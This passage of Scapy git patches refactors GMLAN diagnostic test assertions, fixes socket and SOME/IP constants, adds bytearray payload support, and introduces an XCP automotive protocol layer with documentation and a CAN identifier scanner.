= 3 conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 3 @@ -380,10 +392,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x400000, payload, timeout=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_TransferData(isotpsock, 0x400000, payload, timeout=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = Positive, short payload, scheme = 2 conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 2 @@ -406,10 +418,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=2) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=2) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = Negative, short payload conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 @@ -428,9 +440,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == False - -thread.join(timeout=5) + res = GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == False + thread.join(timeout=5) + assert res = Negative, timeout @@ -465,10 +477,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True # @@ -494,9 +506,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1, retry=1) == True + thread.join(timeout=5) + assert res ############ = Positive, maxmsglen length check -> message is split automatically @@ -535,10 +547,10 @@ thread.name = "ECUSimulator" + thread.name with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() sim_started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x40000000, payload*512, maxmsglen=0x1000000, timeout=8) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_TransferData(isotpsock, 0x40000000, payload*512, maxmsglen=0x1000000, timeout=8) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True ############ Address boundary checks = Positive, highest possible address for scheme @@ -555,9 +567,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 2**32 - 1, payload, timeout=1) == True - -thread.join(timeout=5) + res = GMLAN_TransferData(isotpsock, 2**32 - 1, payload, timeout=1) == True + thread.join(timeout=5) + assert res = Negative, invalid address (too large for addressing scheme) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 @@ -573,9 +585,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 2**32, payload, timeout=1) == False - -thread.join(timeout=5) + res = GMLAN_TransferData(isotpsock, 2**32, payload, timeout=1) == False + thread.join(timeout=5) + assert res = Positive, address zero conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 @@ -591,9 +603,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, 0x00, payload, timeout=1) == True - -thread.join(timeout=5) + res = GMLAN_TransferData(isotpsock, 0x00, payload, timeout=1) == True + thread.join(timeout=5) + assert res = Negative, negative address conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 @@ -609,9 +621,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferData(isotpsock, -1, payload, timeout=1) == False - -thread.join(timeout=5) + res = GMLAN_TransferData(isotpsock, -1, payload, timeout=1) == False + thread.join(timeout=5) + assert res ############################################ + GMLAN_TransferPayload Tests @@ -642,10 +654,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_TransferPayload(isotpsock, 0x40000000, payload, timeout=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_TransferPayload(isotpsock, 0x40000000, payload, timeout=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True ############################################ @@ -682,10 +694,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = Positive scenario, level 3 ecusimSuccessfullyExecuted = True @@ -715,10 +727,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = Negative scenario, invalid password @@ -749,10 +761,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = invalid level (not an odd number) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: @@ -771,9 +783,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True - -thread.join(timeout=5) + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True + thread.join(timeout=5) + assert res ############### retry = Positive scenario, request timeout, retry works @@ -795,9 +807,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True + thread.join(timeout=5) + assert res = Positive scenario, keysend timeout, retry works started = threading.Event() @@ -820,9 +832,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True + thread.join(timeout=5) + assert res = Positive scenario, request error, retry works @@ -845,9 +857,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True + thread.join(timeout=5) + assert res ############################################################################## @@ -889,10 +901,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = sequence of the correct messages, disablenormalcommunication as broadcast ecusimSuccessfullyExecuted = True @@ -930,12 +942,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, - broadcast_socket=GMLAN_BroadcastSocket(new_can_socket0()), - timeout=5, verbose=1) == True - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, broadcast_socket=GMLAN_BroadcastSocket(new_can_socket0()), timeout=5, verbose=1) == True + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True ######## timeout @@ -956,10 +966,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = timeout ReportProgrammedState @@ -988,10 +998,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = timeout ProgrammingMode requestProgramming @@ -1024,10 +1034,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True ###### negative respone = timeout DisableNormalCommunication @@ -1050,10 +1060,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True ###### retry tests = sequence of the correct messages, retry set @@ -1077,9 +1087,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == True - -thread.join(timeout=5) + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == True + assert res + thread.join(timeout=5) = negative response, make sure no retries are made @@ -1100,10 +1110,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=0) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = first fail at DisableNormalCommunication, then sequence of the correct messages @@ -1128,9 +1138,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True + thread.join(timeout=5) + assert res = first fail at ReportProgrammedState, then sequence of the correct messages started = threading.Event() @@ -1158,9 +1168,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True + thread.join(timeout=5) + assert res = first fail at ProgrammingMode requestProgramming, then sequence of the correct messages started = threading.Event() @@ -1192,9 +1202,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True - -thread.join(timeout=5) + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == True + thread.join(timeout=5) + assert res = fail twice ecusimSuccessfullyExecuted = True @@ -1215,10 +1225,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == False - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1, retry=1) == False + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True ############################################################################## + GMLAN_ReadMemoryByAddress Tests @@ -1243,10 +1253,10 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) == payload - -thread.join(timeout=5) -assert ecusimSuccessfullyExecuted == True + res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) == payload + thread.join(timeout=5) + assert res + assert ecusimSuccessfullyExecuted == True = Negative, negative response @@ -1263,9 +1273,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None - -thread.join(timeout=5) + res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1) is None + thread.join(timeout=5) + assert res = Negative, timeout with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: @@ -1288,9 +1298,9 @@ thread = threading.Thread(target=ecusim) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: thread.start() started.wait(timeout=5) - assert GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1, retry=1) == payload - -thread.join(timeout=5) + res = GMLAN_ReadMemoryByAddress(isotpsock, 0x0, 0x8, timeout=1, retry=1) == payload + thread.join(timeout=5) + assert res + Cleanup From 1fc9542e819a81f80d212ed88c9bd4266a6c6ea1 Mon Sep 17 00:00:00 2001 From: Emmanuel Bretelle Date: Wed, 9 Dec 2020 17:48:30 -0800 Subject: [PATCH 0444/1632] Prevent L2socket from busy spinning reading from the socket on busy hosts Fixes #3006 --- scapy/arch/linux.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index ef1e018b5c9..af78f7e0a9a 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -445,6 +445,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, ) self.ins = socket.socket( socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) + self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 0) if not nofilter: if conf.except_filter: if filter: From 893864fed2104ad65fff6c15149ad9b008e85c33 Mon Sep 17 00:00:00 2001 From: Tobias Bartz Date: Mon, 14 Dec 2020 11:53:47 +0100 Subject: [PATCH 0445/1632] fix SOME/IP transport protocol message types --- scapy/contrib/automotive/someip.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index 8dcf8caf37e..d0b0b5fbe08 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -64,8 +64,8 @@ class SOMEIP(Packet): TYPE_TP_REQUEST = 0x20 TYPE_TP_REQUEST_NO_RET = 0x21 TYPE_TP_NOTIFICATION = 0x22 - TYPE_TP_RESPONSE = 0x23 - TYPE_TP_ERROR = 0x24 + TYPE_TP_RESPONSE = 0xa0 + TYPE_TP_ERROR = 0xa1 RET_E_OK = 0x00 RET_E_NOT_OK = 0x01 RET_E_UNKNOWN_SERVICE = 0x02 From f0d8d237f1d5c9c69c9258d5ae8ca70be1b5bf2c Mon Sep 17 00:00:00 2001 From: Gabriel Date: Tue, 15 Dec 2020 01:01:38 +0100 Subject: [PATCH 0446/1632] Apply p-l- suggestion Co-authored-by: Pierre Lalet --- scapy/fields.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/fields.py b/scapy/fields.py index 361c7b8afff..bcc4c79f7e5 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -320,7 +320,7 @@ def any2i(self, pkt, x): # using a MultipleTypeField). # But I don't want to dive into fixing all of them just yet, # so for now, let's keep this this way, even though it's not correct. - if type(self.fld) == Field: + if type(self.fld) is Field: return x return self.fld.any2i(pkt, x) From d7046ed66cb69b432170197519b6ccaa5cc6d304 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 15 Dec 2020 00:17:39 +0000 Subject: [PATCH 0447/1632] Support bytearray in payload --- scapy/packet.py | 4 ++-- test/regression.uts | 5 +++++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index df086f81f2e..02d8591ac5c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -577,7 +577,7 @@ def __div__(self, other): cloneB = other.copy() cloneA.add_payload(cloneB) return cloneA - elif isinstance(other, (bytes, str)): + elif isinstance(other, (bytes, str, bytearray)): return self / conf.raw_layer(load=other) else: return other.__rdiv__(self) # type: ignore @@ -585,7 +585,7 @@ def __div__(self, other): def __rdiv__(self, other): # type: (Any) -> Packet - if isinstance(other, (bytes, str)): + if isinstance(other, (bytes, str, bytearray)): return conf.raw_layer(load=other) / self else: raise TypeError diff --git a/test/regression.uts b/test/regression.uts index b4d78eaeec6..3a627fb14ea 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -995,6 +995,11 @@ a assert(a.copy().time == a.time) a=3 += Bind string array as payload +~ basic +assert bytes(Raw("sca")/"py") == b"scapy" +assert bytes(Raw("sca")/b"py") == b"scapy" +assert bytes(Raw("sca")/bytearray(b"py")) == b"scapy" = Checking overloads ~ basic IP TCP Ether From c008d8e7bb57226c80c6b5e8a1b90137ed3b8faf Mon Sep 17 00:00:00 2001 From: TabeaSpahn Date: Sun, 20 Dec 2020 04:02:13 +0100 Subject: [PATCH 0448/1632] XCP Layer (#2770) * Core typing: utils.py * Added XCP-layer and xcp scanner for issue #2374 * Removed CI and PEP8 Errors Fixed CI and Code quality check errors Removed spell errors Removed spell errors Fixed Codacy errors Removed Coacy error Removed Coacy error Code cleanup for travis-ci * Start XCP Implementation: - Added positive DTO - Added Error codes - Prepared implementation of negative responses - Added Fields for all CTOs * - extend CTO and DTO messages - add xcp docu - add xcp layer for CAN, UDP and TCP - add scanner for XCPonCAN * - Add sniff_time argument to XCPscanner - Simplify/Fix tests and reduce time usage on failure - Simplify XCP implementation - Simplify doc - Enable xcpscanner.uts tests for more configurations (non-root, non-linux) - Improve usage output of xcpscanner * Add connect_scan * Fix potential issues add some comments Allow scanning only one id with a range * add root rights to tests and fix typing * cleanup flags(xcp layer) * change can_interface * add padding to can xcp * add setdefault to config * add test for padding (xcp) Co-authored-by: gpotter2 Co-authored-by: Fabian-Wiche Co-authored-by: Ita1pu Co-authored-by: Andreas Korb --- doc/scapy/layers/automotive.rst | 109 +++ scapy/contrib/automotive/xcp/__init__.py | 11 + .../automotive/xcp/cto_commands_master.py | 543 +++++++++++ .../automotive/xcp/cto_commands_slave.py | 479 ++++++++++ scapy/contrib/automotive/xcp/scanner.py | 152 +++ scapy/contrib/automotive/xcp/utils.py | 134 +++ scapy/contrib/automotive/xcp/xcp.py | 470 ++++++++++ scapy/tools/automotive/xcpscanner.py | 120 +++ test/configs/bsd.utsc | 1 + test/configs/linux.utsc | 1 + test/configs/solaris.utsc | 1 + test/configs/windows.utsc | 1 + test/contrib/automotive/xcp/xcp.uts | 871 ++++++++++++++++++ test/tools/xcpscanner.uts | 179 ++++ 14 files changed, 3072 insertions(+) create mode 100644 scapy/contrib/automotive/xcp/__init__.py create mode 100644 scapy/contrib/automotive/xcp/cto_commands_master.py create mode 100644 scapy/contrib/automotive/xcp/cto_commands_slave.py create mode 100644 scapy/contrib/automotive/xcp/scanner.py create mode 100644 scapy/contrib/automotive/xcp/utils.py create mode 100644 scapy/contrib/automotive/xcp/xcp.py create mode 100755 scapy/tools/automotive/xcpscanner.py create mode 100644 test/contrib/automotive/xcp/xcp.uts create mode 100644 test/tools/xcpscanner.uts diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index b1427672000..c28f5ce6681 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -35,6 +35,9 @@ function to get all information about one specific protocol. | | OBD | OBD, OBD_S0X | | +----------------------+--------------------------------------------------------+ | | CCP | CCP, DTO, CRO | +| +----------------------+--------------------------------------------------------+ +| | XCP | XCPOnCAN, XCPOnUDP, XCPOnTCP, CTORequest, CTOResponse, | +| | | DTO | +---------------------+----------------------+--------------------------------------------------------+ | Transportation Layer| ISO-TP (ISO 15765-2) | ISOTPSocket, ISOTPNativeSocket, ISOTPSoftSocket | | | | | @@ -448,6 +451,64 @@ Sending a CRO message:: Since sr1 calls the answers function, our payload of the DTO objects gets interpreted with the command of our CRO object. + +Universal calibration and measurement protocol (XCP) +==================================================== + +XCP is the successor of CCP. It is usable with several protocols. Scapy includes CAN, UDP and TCP. +XCP has two types of message types: Command Transfer Object (CTO) and Data Transmission Object (DTO). +CTOs send to an ECU are requests (commands) and the ECU has to reply with a positive response or an error. +Additionally, the ECU can send a CTO to inform the master about an asynchronous event (EV) or request a service execution (SERV). +DTOs sent by the ECU are called DAQ (Data AcQuisition) and include measured values. +DTOs received by the ECU are used for a periodic stimulation and are called STIM (Stimulation). + + +Creating a CTO message:: + + CTORequest() / Connect() + CTORequest() / GetDaqResolutionInfo() + CTORequest() / GetSeed(mode=0x01, resource=0x00) + +To send the message over CAN a header has to be added + + pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() + sock = CANSocket(iface=can.interface.Bus(bustype='socketcan', channel='vcan0')) + sock.send(pkt) + +If we are interested in the response of an ECU, we need to set the basecls parameter of the +CANSocket to XCPonCAN and we need to use sr1: +Sending a CTO message:: + + sock = CANSocket(bustype='socketcan', channel='vcan0', basecls=XCPonCAN) + dto = sock.sr1(pkt) + +Since sr1 calls the answers function, our payload of the XCP-response objects gets interpreted with the +command of our CTO object. Otherwise it could not be interpreted. +The first message should always be the "CONNECT" message, the response of the ECU determines how the messages are read. E.g.: byte order. +Otherwise, one must set the address granularity, and max size of the DTOs and CTOs per hand in the contrib config:: + + conf.contribs['XCP']['Address_Granularity_Byte'] = 1 # Can be 1, 2 or 4 + conf.contribs['XCP']['MAX_CTO'] = 8 + conf.contribs['XCP']['MAX_DTO'] = 8 + +If you do not want this to be set after receiving the message you can also disable that feature:: + + conf.contribs['XCP']['allow_byte_order_change'] = False + conf.contribs['XCP']['allow_ag_change'] = False + conf.contribs['XCP']['allow_cto_and_dto_change'] = False + +To send a pkt over TCP or UDP another header must be used. +TCP:: + + prt1, prt2 = 12345, 54321 + XCPOnTCP(sport=prt1, dport=prt2) / CTORequest() / Connect() + +UDP:: + + XCPOnUDP(sport=prt1, dport=prt2) / CTORequest() / Connect() + + + ISOTP ===== @@ -709,6 +770,54 @@ Interactive shell usage example:: < at 0x7f98f912e950>, < at 0x7f98f906c0d0>] +XCPScanner +--------------- + +The XCPScanner is a utility to find the CAN identifiers of ECUs that support XCP. + +Commandline usage example:: + + python -m scapy.tools.automotive.xcpscanner -h + Finds XCP slaves using the "GetSlaveId"-message(Broadcast) or the "Connect"-message. + + positional arguments: + channel Linux SocketCAN interface name, e.g.: vcan0 + + optional arguments: + -h, --help show this help message and exit + --start START, -s START + Start identifier CAN (in hex). + The scan will test ids between --start and --end (inclusive) + Default: 0x00 + --end END, -e END End identifier CAN (in hex). + The scan will test ids between --start and --end (inclusive) + Default: 0x7ff + --sniff_time', '-t' Duration in milliseconds a sniff is waiting for a response. + Default: 100 + --broadcast, -b Use Broadcast-message GetSlaveId instead of default "Connect" + (GetSlaveId is an optional Message that is not always implemented) + --verbose VERBOSE, -v + Display information during scan + + Examples: + python3.6 -m scapy.tools.automotive.xcpscanner can0 + python3.6 -m scapy.tools.automotive.xcpscanner can0 -b 500 + python3.6 -m scapy.tools.automotive.xcpscanner can0 -s 50 -e 100 + python3.6 -m scapy.tools.automotive.xcpscanner can0 -b 500 -v + + +Interactive shell usage example:: + >>> conf.contribs['CANSocket'] = {'use-python-can': False} + >>> load_layer("can") + >>> load_contrib("automotive.xcp.xcp") + >>> sock = CANSocket("vcan0") + >>> sock.basecls = XCPOnCAN + >>> scanner = XCPOnCANScanner(sock) + >>> result = scanner.start_scan() + +The result includes the slave_id (the identifier of the ECU that receives XCP messages), +and the response_id (the identifier that the ECU will send XCP messages to). + UDS diff --git a/scapy/contrib/automotive/xcp/__init__.py b/scapy/contrib/automotive/xcp/__init__.py new file mode 100644 index 00000000000..1a693bdcf8b --- /dev/null +++ b/scapy/contrib/automotive/xcp/__init__.py @@ -0,0 +1,11 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Tabea Spahn +# This program is published under a GPLv2 license + +# scapy.contrib.status = skip + +""" +Package of contrib automotive xcp specific modules +that have to be loaded explicitly. +""" diff --git a/scapy/contrib/automotive/xcp/cto_commands_master.py b/scapy/contrib/automotive/xcp/cto_commands_master.py new file mode 100644 index 00000000000..0d1b49af8af --- /dev/null +++ b/scapy/contrib/automotive/xcp/cto_commands_master.py @@ -0,0 +1,543 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Tabea Spahn +# This program is published under a GPLv2 license + +# scapy.contrib.status = skip + +from scapy.contrib.automotive.xcp.utils import get_ag, get_max_cto, \ + XCPEndiannessField, StrVarLenField +from scapy.fields import ByteEnumField, ByteField, ShortField, StrLenField, \ + IntField, ThreeBytesField, FlagsField, ConditionalField, XByteField, \ + XIntField, FieldLenField +from scapy.packet import Packet, bind_layers + + +# ##### CTO COMMANDS ###### + +# STANDARD 